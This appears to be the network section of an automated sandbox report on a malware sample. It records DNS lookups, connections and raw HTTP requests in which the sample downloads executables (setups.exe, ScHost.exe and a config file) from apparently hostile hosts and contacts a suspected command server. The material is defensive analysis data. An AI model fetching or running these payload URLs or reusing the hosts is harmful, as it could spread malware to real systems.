Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
catser.inappapiurl.com | 138.197.53.157 | |
digitalassets.ams3.digitaloceanspaces.com | 5.101.110.225 | |
greataccesstoserver.com | 159.89.4.33 |
- TCP Requests
-
-
192.168.56.101:49230 117.18.232.200:80
-
192.168.56.101:49215 138.197.53.157:443catser.inappapiurl.com
-
192.168.56.101:49216 138.197.53.157:443catser.inappapiurl.com
-
192.168.56.101:49217 138.197.53.157:443catser.inappapiurl.com
-
192.168.56.101:49218 138.197.53.157:443catser.inappapiurl.com
-
192.168.56.101:49219 138.197.53.157:443catser.inappapiurl.com
-
192.168.56.101:49201 159.89.4.33:80greataccesstoserver.com
-
192.168.56.101:49204 5.101.110.225:443digitalassets.ams3.digitaloceanspaces.com
-
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:55450 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/setups.exe
REQUEST
RESPONSE
BODY
GET /cstadmo/setups.exe HTTP/1.1
Host: digitalassets.ams3.digitaloceanspaces.com
Connection: Keep-Alive
HTTP/1.1 200 OK
content-length: 2110791
accept-ranges: bytes
last-modified: Wed, 07 Apr 2021 12:24:13 GMT
x-rgw-object-type: Normal
etag: "44ecbc585f2689d58b5ae9f04fe01b3e"
x-amz-request-id: tx0000000000000f7d54050-00606fbd7d-90880e1-ams3b
content-type: application/octet-stream
date: Fri, 09 Apr 2021 02:35:41 GMT
strict-transport-security: max-age=15552000; includeSubDomains; preload
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method
GET
200
http://greataccesstoserver.com/files/ScHost.exe
REQUEST
RESPONSE
BODY
GET /files/ScHost.exe HTTP/1.1
Host: greataccesstoserver.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 09 Apr 2021 02:35:15 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Thu, 08 Apr 2021 11:36:36 GMT
ETag: "56000-5bf7475c04268"
Accept-Ranges: bytes
Content-Length: 352256
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET
200
http://greataccesstoserver.com/files/ScHost.exe.config
REQUEST
RESPONSE
BODY
GET /files/ScHost.exe.config HTTP/1.1
Host: greataccesstoserver.com
HTTP/1.1 200 OK
Date: Fri, 09 Apr 2021 02:35:16 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 31 Mar 2021 11:46:34 GMT
ETag: "744-5bed3aaaa7a6a"
Accept-Ranges: bytes
Content-Length: 1860
Content-Type: application/x-msdos-program
GET
200
http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
REQUEST
RESPONSE
BODY
GET /IE9CompatViewList.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: ie9cvlist.ie.microsoft.com
If-Modified-Since: Thu, 21 Nov 2019 19:37:08 GMT
If-None-Match: 0x8D76EBA32AF0BC3
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Age: 15615
Cache-Control: max-age=21600
Content-MD5: wjbjFuG5rGDOFdrHvLiy3g==
Content-Type: text/xml
Date: Fri, 09 Apr 2021 02:36:48 GMT
Etag: 0x8D871FC7BDF491D
Last-Modified: Fri, 16 Oct 2020 17:54:09 GMT
Server: ECAcc (tka/897A)
Vary: Accept-Encoding
X-Cache: HIT
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: 146bd7a5-e01e-0064-7bc4-2c5da2000000
x-ms-version: 2009-09-19
Content-Length: 13718
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts